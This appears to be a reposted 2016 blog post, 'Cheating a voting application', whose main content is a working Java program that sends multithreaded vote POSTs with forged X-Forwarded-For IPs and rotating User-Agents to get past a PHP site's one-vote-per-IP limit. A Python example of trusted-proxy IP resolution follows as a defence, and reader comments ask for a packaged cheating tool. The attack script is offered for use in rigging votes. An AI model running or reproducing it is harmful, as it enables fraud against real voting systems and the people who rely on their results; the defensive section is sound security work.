Cheating a voting application: forging arbitrary IP addresses to bypass the restriction

Author: 封笔尘缘 Category: Resource sharing Published: 2016-6-24 2782 views 64 comments

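A certain web voting application uses an IP restriction and a cookie restriction to limit each IP to one vote per day. It is developed in PHP, and it obtains the visitor's IP through Sohu's interface: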

http://txt.go.sohu.com/ip/soip

The following shows how the IP restriction is bypassed by controlling the IP recorded for each vote:

package com.github.digdeep126;
 
import java.io.OutputStream;
import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLConnection;
import java.util.Random;
 
public class Post {
    public static final String[] ipArrays = {
        "66.102.251.", "112.211.0.", "141.8.225.","159.106.121.",
        "216.58.221.", "61.244.148.", "59.125.39.", "58.30.15.", "114.80.166.",
        "202.96.134.", "58.19.24.", "119.39.23.", "58.195.128.", "124.236.223.",
        "183.221.217.", "222.182.90.", "58.194.96.", "211.138.161.",
        "112.112.13.", "219.159.82.", "202.98.226.", "61.128.101.",
        "130.039.000.", "130.039.255.", "131.230.000.","131.230.255.",
        "144.092.000.", "144.092.255.", "151.000.000.", "152.255.255.",
        "161.058.000.", "161.058.255.", "169.208.000.", "169.223.255.",
        "171.208.000.", "171.220.255.", "195.010.040.", "195.010.040.",
        "195.010.062.", "195.010.063.", "195.010.194.", "195.010.194.",
        "195.063.159.", "195.063.159.", "195.090.044.", "195.090.046.",
        "195.090.047.", "195.090.048.", "195.090.049.", "195.090.051.",
        "195.090.052.", "195.090.053.", "195.100.066.", "195.112.164.",
        "195.112.172.", "195.112.173."};
     
    public static void main(String[] args) throws Exception{
         
        for(int i=0; i<20; i++){
            Runnable runn = new Runnable() {
                public void run() {
                    try {
                        post();
                    } catch (Exception e) {
                        e.printStackTrace();
                    }
                }
            };
            // start() runs post() on the new thread; run() would execute it on the calling thread
            new Thread(runn).start();
            Thread.sleep(2000);
        }
    }
     
    public static void post() throws Exception{
        URL url = new URL("http://xxxxxxxxxxxx");
        URLConnection con = url.openConnection();
 
        con.setDoOutput(true);
        con.setDoInput(true);
 
        Random r = new Random();
        Integer counter = r.nextInt(255);
         
        // Index over the whole prefix table instead of a hard-coded bound
        int index = r.nextInt(ipArrays.length);
        String ip = ipArrays[index];
         
        con.setRequestProperty("X-Forwarded-For", ip + counter);
        System.out.println(ip+counter);
        con.setRequestProperty("cache-control","max-age=0");
        if(r.nextInt(10) % 2 == 0)
            con.setRequestProperty("User-Agent","Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19");
        else
            con.setRequestProperty("User-Agent","Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0");
         
        con.setUseCaches(false);
 
        OutputStream out = con.getOutputStream();
        // xxx is the vote payload, elided in the original post
        out.write(("data=" + xxx).getBytes());
        out.flush();
        out.close();
        con.getInputStream();
    }
}

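Each run starts 20 threads that make 20 POST submissions with the body data=xxxx, and each submission carries a forged IP address in the X-Forwarded-For header. This gets past the IP restriction in the server-side PHP code.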
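A server-side check that is not fooled by this, as an added example rather than code from the original post or the voting application: the one-vote-per-day key is taken from the TCP peer address, and X-Forwarded-For is read only when that peer is a known reverse proxy. The proxy range 10.0.0.0/8, the function and class names, and the sample addresses are assumptions constructed for illustration.

```python
import ipaddress
from datetime import date

# Assumption: the application's own reverse proxies live in this range.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def _is_trusted(addr):
    return any(addr in net for net in TRUSTED_PROXIES)


def client_ip(peer_addr, xff_header=None):
    """Address to rate-limit on. peer_addr is the TCP peer (REMOTE_ADDR in PHP)."""
    peer = ipaddress.ip_address(peer_addr)
    if not _is_trusted(peer) or not xff_header:
        # Direct connection: the header is client-supplied, so ignore it.
        return str(peer)
    # Our proxies append on the right; walk right to left and stop at the
    # first hop that is not one of ours. Entries left of it are unverified.
    for hop in reversed([h.strip() for h in xff_header.split(",")]):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return str(peer)  # malformed chain: fall back to the peer
        if not _is_trusted(addr):
            return str(addr)
    return str(peer)


class VoteLimiter:
    """One vote per resolved client address per day (in-memory for the demo)."""

    def __init__(self):
        self._seen = set()

    def try_vote(self, peer_addr, xff_header=None, day=None):
        key = (client_ip(peer_addr, xff_header), day or date.today())
        if key in self._seen:
            return False
        self._seen.add(key)
        return True


def replay_forged_headers(n=20):
    """Constructed replay: one direct client, a new X-Forwarded-For per request."""
    limiter = VoteLimiter()
    return sum(limiter.try_vote("203.0.113.7", f"66.102.251.{i}") for i in range(n))
```

With this resolution, the 20 requests from the program above count as a single voter, because they all arrive from the same peer address.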

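This article is from 封笔尘缘. When reposting, please credit the source and include the corresponding link.

Permanent link to this article: http://www.moxcn.com/?post=347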


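4 comments

  1. themebetter 2016-07-08 11:10

    Arbitrary voting is really easy!

  1. 滕绍武的博客 2016-07-04 22:51

    Make it into a program and share it.

  1. Hopi 2016-06-24 11:13

    [sweat][sweat][sweat] Make it into a program, I can't follow this.

    1. 封笔尘缘 2016-06-24 20:01

      @Hopi: Maybe when I have time.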
